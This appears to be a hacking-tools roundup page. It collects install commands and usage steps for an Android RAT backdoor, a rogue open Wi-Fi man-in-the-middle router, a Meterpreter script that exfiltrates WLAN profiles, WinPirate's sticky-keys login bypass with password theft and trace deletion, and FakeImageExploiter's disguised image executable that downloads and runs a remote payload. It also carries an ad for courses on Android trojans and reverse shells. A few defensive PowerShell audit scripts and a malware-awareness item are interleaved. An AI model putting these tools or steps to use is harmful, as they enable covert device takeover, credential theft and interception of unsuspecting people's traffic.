AhMyth Android Rat – Remote Administration Tool

AhMyth Android RAT is an Android Remote Administration Tool. It consists of two parts:

  1. Server side: desktop application based on the Electron framework (control panel)
  2. Client side: Android application (backdoor)

You have two options to install AhMyth:

From source code

  • Electron (to start the app)
  • Java (to generate apk backdoor)
  • Electron-builder and electron-packer (to build binaries for OSX, Windows, Linux)
  1. git clone https://github.com/AhMyth/AhMyth-Android-RAT.git
  2. cd AhMyth-Android-RAT/AhMyth-Server
  3. npm start

From binaries

  • Download a prebuilt binary from the GitHub project
  • Java (to generate apk backdoor)

Video Tutorial

https://youtu.be/DDIZTABABzs

MITM : Man-in-the-middle Router

Turn any Linux PC into an open Wi-Fi network that silently man-in-the-middles all HTTP traffic. It runs inside a Docker container using hostapd, dnsmasq, and mitmproxy to create an open honeypot wireless network named “Public”. For added fun, change the network name to “xfinitywifi” to auto-connect anyone who has ever connected to one of those networks… they are everywhere.

# clone the repo
git clone https://github.com/brannondorsey/mitm-router
cd mitm-router

# build the image this step can be omitted if you prefer to pull 
# the image from the docker hub repository
docker build . -t brannondorsey/mitm-router

Run the following, replacing AP_IFACE and INTERNET_IFACE with your wireless device and your internet-connected ethernet/wireless device respectively. You can see the names of your network devices by running ifconfig.

# run the container
docker run -it --net host --privileged \
-e AP_IFACE="wlan0" \
-e INTERNET_IFACE="eth0" \
-e SSID="Public" \
-v "$(pwd)/data:/root/data" \
brannondorsey/mitm-router

If all went well, you should see something like this:

Current MAC:   a5:ae:f9:a4:b7:e3 (TP-LINK TECHNOLOGIES CO.,LTD.)
Permanent MAC: a5:ae:f9:a4:b7:e3 (TP-LINK TECHNOLOGIES CO.,LTD.)
New MAC:       00:d2:6b:d5:fe:bd (PHOTRON USA)
[ ok ] Starting system message bus: dbus.
[ ok ] Starting DNS forwarder and DHCP server: dnsmasq.
[ ok ] Starting advanced IEEE 802.11 management: hostapd.
Proxy server listening at http://0.0.0.0:1337

mitm-router transparently captures all HTTP traffic sent to the router at 10.0.0.1:80. It does not intercept HTTPS traffic (port 443), as doing so would alert a user that a possible man-in-the-middle attack was taking place. Traffic to URLs that begin with https:// will not be captured.

The mitm-router/data/ folder is shared with the docker container so that we can view the capture files that it places there on our host machine. By default, you will find the mitmdump capture file in mitm-router/data/http-traffic.cap.

You can also connect your INTERNET_IFACE to a hotspot running on your phone for MITM on the go 😉

Configuring Man-in-the-middle

Supported environment variables are listed below with their default values:

# wireless device name that will be used for the Access Point
AP_IFACE="wlan0"

# device name that is used for the router's internal internet connection
# packets from AP_IFACE will be forwarded to this device
INTERNET_IFACE="eth0"

# wireless network name
SSID="Public"

# optional WPA2 password; if left empty network will be public
PASSWORD=""

# optional randomization of AP_IFACE MAC address
# can be set to a specific value like "XX:XX:XX:XX:XX:XX"
# or "unchanged" to leave the device MAC alone
MAC="random"

# tcpdump output file location inside the container
CAPTURE_FILE="/root/data/http-traffic.cap"

# optional mitmproxy filter
# see http://docs.mitmproxy.org/en/stable/features/filters.html
FILTER=""

Security

This access point runs inside of Docker for isolation, ensuring that any vulnerabilities that may be exploitable in the access point will not give an adversary access to your computer or home network. That said, there are a few caveats to be aware of:

  • --net host shares all of the network interfaces and iptables entries of the host machine with the Docker container. Assume that a compromised Docker container would have root access to these devices.
  • Running in --privileged mode gives extended permissions to the Docker container.
  • Your host machine (the one running Docker) will be accessible on the “Public” network as a connected client. For this reason, please use a firewall (ufw on Linux) to block incoming traffic on all ports so that computers on the “Public” network do not have access to exposed services on your machine.
  • All traffic on the honeypot network will be outbound from your home network’s gateway. If someone on the “Public” network is torrenting or conducting illegal activity you will be held accountable and your ISP may cancel your service.

For added security, I prefer to run this docker container on a dedicated computer, like a Raspberry Pi.

WiFi Password Decryptor Software To Recover Wireless Password

WiFi Password Decryptor is free software to instantly recover wireless account passwords stored on your system. It automatically recovers all types of wireless keys/passwords (WEP/WPA/WPA2 etc.) stored by the Windows Wireless Configuration Manager.

For each recovered WiFi account, it displays the following information:

  1. WiFi Name (SSID)
  2. Security Settings (WEP-64/WEP-128/WPA2/AES/TKIP)
  3. Password Type
  4. Password in clear text

After a successful recovery you can save the password list to an HTML/XML/TEXT file. You can also right-click on any of the displayed accounts and quickly copy the password.

Under the hood, ‘WiFi Password Decryptor’ uses the System Service technique (rather than injecting into LSASS.exe) to decrypt the WiFi passwords. This makes it more secure and reliable. It also allows a single EXE to handle both 32-bit and 64-bit platforms.

It has been successfully tested on Windows Vista and higher operating systems, including Windows 8.

How to Use WiFi Password Decryptor

WiFiPasswordDecryptor is easy to use with its simple GUI. Here are the brief usage details:

  • Launch WiFiPasswordDecryptor on your system
  • Next, click the ‘Start Recovery’ button and all stored WiFi account passwords will be recovered and displayed, as shown in screenshot 1 below.
  • You can right-click any of the displayed accounts to quickly copy the password
  • You can also generate a detailed password recovery report in HTML/XML/Text format by clicking the ‘Export’ button and then selecting the file type from the drop-down box of the ‘Save File’ dialog.

Note: You need to have administrative privileges to run this tool.

Limitations

This tool can recover only the WiFi passwords configured by the Windows Wireless Configuration Manager. It also does not work on older operating systems like Windows XP and 2003. It works well with Vista and all higher versions.

How To Hack Android Device using Python Scripts?

Ever wonder how bad guys hack Android devices? Or how they manage to steal data from remote locations? Well, there are many ways to get into any Android or iOS smartphone. However, the simplest and most effective way is to use a backdoor (Trojan, malware) that opens the channel for stealing personal information, taking control of the mobile, ad fraud, stealing financial data and other potential damage.

Who helps the hackers? Hacking tools? But sometimes, or more often than not, the tools don’t work. This is where we separate a script kiddie from a pro: a professional hacker or cyber security professional writes his own code to bypass the issues and challenges he faces, while script kiddies just follow what has been made by an expert.

Master hacking like a pro using Python scripts, learn how to hack any Android device using a backdoor, write your own scripts to hack, and don’t depend on anyone’s tools.

EH Academy offers a crash training program that teaches the art of writing Python scripts that hack Android devices. The focus of the course is to create a Trojan, spread the Trojan to get access to many Android devices at once, learn to create backdoors and hack any Android phone. What you will learn in the training program:

  1. Code a simple Android GUI interface purely in Python
  2. Build a simple cross platform SSH botnet purely in Python
  3. Code an SSH Android Trojan
  4. Transfer / exfiltrate Data out of target device
  5. Run Python SSH reverse shell on Windows, Linux, Android
  6. Transfer and decode Android calls, SMS messages and the WhatsApp chat database.


Metasploit getwlanprofiles – Simple Script To Download Wireless Profiles From Windows Client

Metasploit getwlanprofiles is a Meterpreter script which, when run against Windows 7 or Vista boxes, will extract and download all the wireless profiles that are set up with the Windows client, i.e. not with third-party client applications.

It does this by using the following command to dump all the profiles to the current %TEMP% directory:

netsh wlan export profile folder=%TEMP%

Then, for each line of the output, it finds the filename of the profile and downloads it. To clean up, the file is then deleted from the directory.

The profiles are stored in the .msf3/logs/scripts/wlan_profiles/ directory.

To re-use the profiles, they can be imported into another Windows box by using the following command:

netsh wlan add profile filename="the_filename.xml"

Something that was found while testing this is that if you have an external WiFi card and set up the profiles, then remove the card, the profiles are no longer accessible to the netsh script. When the card is reinserted the profiles return. There may still be a way to access them, but Metasploit getwlanprofiles doesn’t do it.
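The profiles that getwlanprofiles downloads, and that WiFi Password Decryptor reads (SSID, security settings, password type, key), are the WLAN_profile XML documents that netsh wlan export profile writes. As an added example (not code from either tool), the following PowerShell audits such exports from the defender's side, flagging open or WEP/TKIP profiles and any pre-shared key that was exported in clear text. The two profiles embedded below are constructed samples.

```powershell
# Added example (not getwlanprofiles or WiFi Password Decryptor code): audit WLAN profile XML
# files of the kind "netsh wlan export profile" writes, flagging weak authentication/encryption
# and pre-shared keys stored in clear text. The two profiles below are constructed samples.

function Get-WlanProfileFinding {
    param([Parameter(Mandatory)][xml]$Profile)

    $p    = $Profile.WLANProfile          # PowerShell's XML adapter ignores the namespace
    $sec  = $p.MSM.security
    $auth = $sec.authEncryption.authentication
    $enc  = $sec.authEncryption.encryption
    $key  = $sec.sharedKey                # absent for open networks

    $issues = @()
    if ($auth -in 'open','shared') { $issues += "no network authentication ($auth)" }
    if ($enc  -in 'WEP','none')    { $issues += "weak or no encryption ($enc)" }
    if ($enc  -eq 'TKIP')          { $issues += 'TKIP encryption (deprecated)' }
    if ($key -and $key.protected -eq 'false' -and $key.keyMaterial) {
        $issues += 'pre-shared key stored in clear text (exported with key=clear)'
    }
    if ($p.connectionMode -eq 'auto' -and $auth -eq 'open') {
        $issues += 'auto-connects to an open SSID (rogue access point risk)'
    }

    [pscustomobject]@{
        Name           = $p.name
        Ssid           = $p.SSIDConfig.SSID.name
        Authentication = $auth
        Encryption     = $enc
        KeyType        = if ($key) { $key.keyType } else { 'n/a' }
        Issues         = $issues -join '; '
    }
}

# Constructed sample profiles using the WLAN_profile schema netsh emits.
$samples = @(
@'
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
  <name>HomeNet</name>
  <SSIDConfig><SSID><name>HomeNet</name></SSID></SSIDConfig>
  <connectionMode>auto</connectionMode>
  <MSM><security>
    <authEncryption><authentication>WPA2PSK</authentication><encryption>AES</encryption></authEncryption>
    <sharedKey><keyType>passPhrase</keyType><protected>false</protected>
      <keyMaterial>constructed-sample-passphrase</keyMaterial></sharedKey>
  </security></MSM>
</WLANProfile>
'@,
@'
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
  <name>Public</name>
  <SSIDConfig><SSID><name>Public</name></SSID></SSIDConfig>
  <connectionMode>auto</connectionMode>
  <MSM><security>
    <authEncryption><authentication>open</authentication><encryption>none</encryption></authEncryption>
  </security></MSM>
</WLANProfile>
'@
)

foreach ($xmlText in $samples) { Get-WlanProfileFinding -Profile ([xml]$xmlText) | Format-List }
# To audit real exports instead:
#   Get-ChildItem "$env:TEMP\*.xml" | % { Get-WlanProfileFinding ([xml](Get-Content $_ -Raw)) }
```

A profile whose keyMaterial is marked protected=true holds the key DPAPI-encrypted for the exporting machine, which is why tools like the ones above run on the target itself rather than decrypting the exported file elsewhere.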

Metasploit getwlanprofiles Usage

Simply uncompress the script and move it to the meterpreter/scripts directory. It is also probably best to remove the version number from the filename while doing so.

When you run Metasploit getwlanprofiles, it should look like this:

meterpreter > run getwlanprofiles 
[*] Running Windows Wlan Profile Downloader Meterpreter Script
[*] New session on 192.168.0.80:53831...
[*] Running export command - netsh wlan export profile folder=C:\Users\robin\AppData\Local\Temp
[*] Downloading profile wpa_profile to /home/robin/.msf3/logs/scripts/wlan_profiles/VISTA-DOMAIN_20110110.5030/wpa_profile.xml
[*]     Deleting file C:\Users\robin\AppData\Local\Temp\Wireless Network Connection 2-wpa.xml
[*] Downloading profile thisiswep to /home/robin/.msf3/logs/scripts/wlan_profiles/VISTA-DOMAIN_20110110.5030/thisiswep.xml
[*]     Deleting file C:\Users\robin\AppData\Local\Temp\Wireless Network Connection 2-thisiswep.xml
[*] Downloading profile eap to /home/robin/.msf3/logs/scripts/wlan_profiles/VISTA-DOMAIN_20110110.5030/eap.xml
[*]     Deleting file C:\Users\robin\AppData\Local\Temp\Wireless Network Connection 2-this is it.xml
[*] Found and extracted 3 profiles
[*] Done!

WinPirate – Automated Sticky Keys Hack

We create a way to automate doing the Windows sticky keys hack from a bootable USB. Then, we automate getting as many saved passwords as possible, drop a listener, and delete all traces that we were there, all without being detected by antivirus. We should add a mimikittenz option for when the computer is found running and unlocked; otherwise we can just run it later remotely.

How To Use Sticky Keys Hack

Requirements: a Linux bootable USB, this repo on the USB (not in the OS, just put it in the root directory)

  • shut down Windows (make sure it is not hibernating by holding Shift while pressing Shut down)
  • hit F12 and select USB
  • sudo -i
  • fdisk -l (note: if you’re on Kali Linux, run parted -l)
  • mkdir /media/windows
  • mount /dev/WHATEVERTHEWINDOWSPARTITIONWASCALLED /media/windows -t ntfs
  • run Stickykeys.sh
  • restart and boot to Windows
  • hit Shift 5 times fast, a command prompt will appear
  • cd to the USB and run WinPirate.bat

If the computer isn’t locked: cd to the USB and run Run.bat (this will run WinPirate.bat silently in the background; it should be done in < 10 seconds).

Current Issues

  • The Chrome passwords grabber that I made is still a .py. For it to work, I need to convert it to an exe so it doesn’t require Python to be installed on the system.
    You can run it with python chromepasswords.py -csv and it will decrypt the Chrome saved passwords database and export it as a CSV
  • The sticky keys automation doesn’t speed the process up as much as I previously thought, as is evident from the lengthy “How to Use” section
  • I haven’t been able to write any tools that grab passwords for IE or Firefox

DVIA – Damn Vulnerable iOS Application

Damn Vulnerable iOS App (DVIA) is an iOS application that is damn vulnerable. Its main goal is to provide a platform for mobile security enthusiasts, professionals or students to test their iOS penetration testing skills in a legal environment.

DVIA Vulnerabilities and Challenges Include

  1. Local Data Storage
  2. Jailbreak Detection
  3. Excessive Permissions
  4. Runtime Manipulation
  5. Anti Anti Hooking/Debugging
  6. Binary Protection
  7. Touch/Face ID Bypass
  8. Phishing
  9. Side Channel Data Leakage
  10. IPC Issues
  11. Broken Cryptography
  12. Webview Issues
  13. Network Layer Security
  14. Application Patching
  15. Sensitive Information in Memory
  16. Data Leakage to Third parties

All these vulnerabilities have been tested up to iOS 11.

Use a Fake image.jpg ‘FakeImageExploiter’ to Exploit Targets

FakeImageExploiter stores all files in the apache2 webroot, zips (.zip) the agent, starts the apache2 and metasploit services (handler), and provides a URL to send to the target (triggers the agent.zip download). When the victim runs our executable, our picture will be downloaded and opened in the default picture viewer, our malicious payload will be executed, and we will get a meterpreter session.

It also stores the agent (not zipped) in the FakeImageExploiter/output folder in case we wish to deliver agent.jpg.exe using a different attack vector.

This tool also builds a cleaner.rc file to delete the payloads left on the target.

Description

This module takes one existing image.jpg and one payload.ps1 (input by the user) and builds another payload (agent.jpg.exe) that, if executed, will trigger the download of the 2 previous files stored in apache2 (image.jpg + payload.ps1) and execute them.

This module also changes the agent.exe icon to match one file.jpg, then uses the ‘Hide extensions for known file types’ trick to hide the agent.exe extension.

All payloads (user input) will be downloaded from our apache2 webserver and executed in the target’s RAM. The only extension (payload input by the user) that requires writing the payload to disk is .exe binaries.
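The agent.jpg.exe disguise described above only works while Explorer hides known extensions and the double-extension file goes unnoticed. As an added defender-side example (not part of FakeImageExploiter), the following PowerShell reports the HideFileExt setting and hunts a folder for executables hiding behind an image or document extension; the demo directory it scans is constructed, and file names and hashes are placeholders.

```powershell
# Added example (not FakeImageExploiter code): defender checks for the two things the
# agent.jpg.exe trick depends on: Explorer hiding known extensions, and executables
# masquerading behind an image/document extension. Demo directory below is constructed.

function Test-HideFileExtSetting {
    # HideFileExt = 1 makes Explorer display "agent.jpg" for a file named agent.jpg.exe.
    $key = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced'
    $val = Get-ItemProperty -Path $key -Name HideFileExt -ErrorAction SilentlyContinue
    [pscustomobject]@{
        HideFileExt    = if ($null -ne $val) { $val.HideFileExt } else { 'unset (extensions hidden by default)' }
        ExtensionsShown = ($null -ne $val -and $val.HideFileExt -eq 0)
    }
}

function Find-DoubleExtensionExecutables {
    param([Parameter(Mandatory)][string]$Path)
    # A decoy extension immediately followed by an executable one, e.g. holiday.jpg.exe
    $pattern = '\.(jpe?g|png|gif|pdf|docx?|xlsx?|txt)\.(exe|scr|com|bat|cmd|ps1|vbs|js|pif)$'
    Get-ChildItem -Path $Path -File -Recurse -Force |
        Where-Object { $_.Name -match $pattern } |
        ForEach-Object {
            $sig = Get-AuthenticodeSignature -FilePath $_.FullName
            [pscustomobject]@{
                File      = $_.FullName
                Displayed = $_.Name -replace '\.[^.]+$', ''   # what Explorer shows with HideFileExt=1
                Signature = $sig.Status
                Sha256    = (Get-FileHash -Algorithm SHA256 $_.FullName).Hash
            }
        }
}

# --- constructed demo directory (placeholder text files, not real binaries) ---
$demo = Join-Path $env:TEMP 'fakeimage-demo'
New-Item -ItemType Directory -Path $demo -Force | Out-Null
Set-Content -Path (Join-Path $demo 'holiday.jpg.exe') -Value 'constructed placeholder, not a real binary'
Set-Content -Path (Join-Path $demo 'holiday.jpg')     -Value 'constructed placeholder image'

Test-HideFileExtSetting | Format-List
Find-DoubleExtensionExecutables -Path $demo | Format-Table -AutoSize
```

In practice point Find-DoubleExtensionExecutables at a Downloads folder or a mail attachment quarantine; setting HideFileExt to 0 for users removes the disguise the tool counts on.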

FakeImageExploiter v1.3 – backdoor images.jpg[.ps1]

CodeName: Metamorphosis
Version release: v1.3 (Stable)
Author: pedro ubuntu [ r00t-3xp10it ]
Distros Supported : Linux Ubuntu, Kali, Mint, Parrot OS
Suspicious-Shell-Activity (SSA) RedTeam develop @2017

Payloads accepted (user input):

payload.ps1 (default) | payload.bat | payload.txt | payload.exe [Metasploit]
"Edit 'settings' file before runing tool to use other extensions"

Pictures accepted (user input):

All pictures with .jpg (default) | .jpeg | .png  extensions (all sizes)
"Edit 'settings' file before runing tool to use other extensions"

Dependencies/Limitations:

xterm, zenity, apache2, mingw32[64], ResourceHacker(wine)
'Auto-Installs ResourceHacker.exe under ../.wine/Program Files/.. directorys'

WARNING: To change icon manually (resource hacker bypass) edit 'settings' file.
WARNING: Only under windows systems the 2º extension will be hidden (so zip it) 
WARNING: The agent.jpg.exe requires the inputed files to be in apache2 (local lan hack)
WARNING: The agent.jpg.exe uses the powershell interpreter (does not work againts wine).
WARNING: This tool will not accept payload (user input) arguments (eg nc.exe -lvp 127.0.0.1 555)
WARNING: The ResourceHacker provided by this tool requires WINE to be set to windows 7

Download/Install/Config:

1º - Download framework from github
     git clone https://github.com/r00t-3xp10it/FakeImageExploiter.git

2º - Set file execution permissions
     cd FakeImageExploiter
     sudo chmod +x *.sh

3º - Config FakeImageExploiter settings
     nano settings

4º - Run main tool
     sudo ./FakeImageExploiter.sh

Framework Banner

Settings file

Agent(s) in windows systems

Video tutorials

FakeImageExploiter [ Official release – Main functions ]

https://www.youtube.com/watch?v=4dEYIO-xBHU

FakeImageExploiter [ the noob friendly function ]

https://www.youtube.com/watch?v=abhIp-SG4kM

FakeImageExploiter [ bat payload – worddoc.docx agent ]

https://www.youtube.com/watch?v=Ah4hejGhj-M

FakeImageExploiter [ txt payload – msfdb rebuild ]

https://www.youtube.com/watch?v=g2E73GyxKhw

WinPirate : Automated Sticky Keys Hack From A Bootable USB

Automated sticky keys hack. Post exploitation, it grabs browser passwords, history, and network passwords. Here’s the plan. We create a way to automate doing the Windows sticky keys hack from a bootable USB, which we call WinPirate. Then, we automate getting as many saved passwords as possible, drop a listener, and delete all traces that we were there.

All without being detected by antivirus. We should add a mimikittenz option if the computer was found running and unlocked, otherwise we can just run it later remotely.

How to Use WinPirate

Requirements: a Linux bootable USB, this repo on the USB (not in the OS, just put it in the root directory)

Note: chromepasswords.py requires PyWin32

If the computer is locked:

  • shut down Windows (make sure it is not hibernating by holding Shift while pressing Shut down)
  • hit F12 and select USB
  • sudo -i
  • fdisk -l (note: if you’re on Kali Linux, run parted -l)
  • mkdir /media/windows
  • mount /dev/WHATEVERTHEWINDOWSPARTITIONWASCALLED /media/windows -t ntfs
  • run Stickykeys.sh
  • restart and boot to Windows
  • hit Shift 5 times fast, a command prompt will appear
  • cd to the USB and run WinPirate.bat

If the computer isn’t locked:

cd to the USB and run Run.bat (this will run WinPirate.bat silently in the background; it should be done in < 10 seconds).
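Both WinPirate walkthroughs above rely on Stickykeys.sh swapping the Sticky Keys handler so that five Shift presses at the logon screen yield a command prompt. As an added defender-side example (not WinPirate code), this PowerShell checks the logon-screen accessibility binaries for that swap and for the Image File Execution Options "Debugger" variant of the same hijack; it assumes an elevated prompt on the Windows host being audited.

```powershell
# Added example (not WinPirate code): integrity check for the accessibility binaries the
# sticky keys hack swaps for cmd.exe, plus the Image File Execution Options "Debugger"
# variant of the same hijack. Run from an elevated prompt on the host being audited.

function Test-AccessibilityBinaries {
    $system32 = Join-Path $env:SystemRoot 'System32'
    $cmdHash  = (Get-FileHash -Algorithm SHA256 (Join-Path $system32 'cmd.exe')).Hash
    $ifeoRoot = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'

    # Helpers launchable from the logon screen; sethc.exe is the Sticky Keys handler.
    foreach ($name in 'sethc.exe','utilman.exe','osk.exe','narrator.exe','magnify.exe') {
        $path = Join-Path $system32 $name
        if (-not (Test-Path $path)) { continue }

        $sig      = Get-AuthenticodeSignature -FilePath $path
        $hash     = (Get-FileHash -Algorithm SHA256 $path).Hash
        $debugger = Get-ItemProperty -Path (Join-Path $ifeoRoot $name) -Name Debugger -ErrorAction SilentlyContinue

        $findings = @()
        # A swapped-in cmd.exe still carries a valid Microsoft signature, so the hash
        # comparison is the check that actually catches the classic offline swap.
        if ($hash -eq $cmdHash) { $findings += 'byte-identical to cmd.exe (swapped binary)' }
        if ($sig.Status -ne 'Valid') {
            $findings += "signature status: $($sig.Status)"
        } elseif ($sig.SignerCertificate.Subject -notmatch 'Microsoft') {
            $findings += "signed by non-Microsoft subject: $($sig.SignerCertificate.Subject)"
        }
        if ($debugger) { $findings += "IFEO Debugger set to '$($debugger.Debugger)'" }

        [pscustomobject]@{
            Binary   = $name
            Sha256   = $hash
            Status   = if ($findings) { 'SUSPICIOUS' } else { 'OK' }
            Findings = $findings -join '; '
        }
    }
}

Test-AccessibilityBinaries | Format-Table -AutoSize
```

The check is detective only; the offline swap itself (mounting the NTFS partition from a bootable USB) is prevented by full-disk encryption such as BitLocker, which keeps the system volume unreadable from the Linux side.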

Current Issues

  1. The Chrome passwords grabber that I made is still a .py. For it to work, I need to convert it to an exe so it doesn’t require Python to be installed on the system.
    You can run it with python chromepasswords.py -csv and it will decrypt the Chrome saved passwords database and export it as a CSV
  2. The sticky keys automation doesn’t speed the process up as much as I previously thought, as is evident from the lengthy “How to Use” section
  3. I haven’t been able to write any tools that grab passwords for IE or Firefox

Malicious Apps Change Their Name To Be Back On Google Play Store

The Google Play Store has a reputation for being the safest place online to get Android applications, and Google does a great job of encouraging users to limit their exposure to malware and other threats by configuring their smartphones to prohibit side-loading and alternative app markets in the Android Settings.

This malware, “Android.Reputation.1”, appears on the Play Store hidden in at least seven applications in the U.S. offering fun, useful, and sometimes treacherous features. These include emoji keyboard add-ons, space cleaners, calculators, app lockers, and call recorders. None of the samples we examined actually worked as advertised on their Google Play pages. Once the application is installed, it takes various measures to remain on the device, disappear, and erase its tracks.

Stay protected from mobile malware by taking these precautions:

  • Keep your software up to date
  • Do not download apps from unfamiliar sites
  • Only install apps from trusted sources
  • Pay close attention to the permissions requested by apps
  • Install a suitable mobile security app, such as Norton or SEP Mobile, to protect your device and data
  • Make frequent backups of important data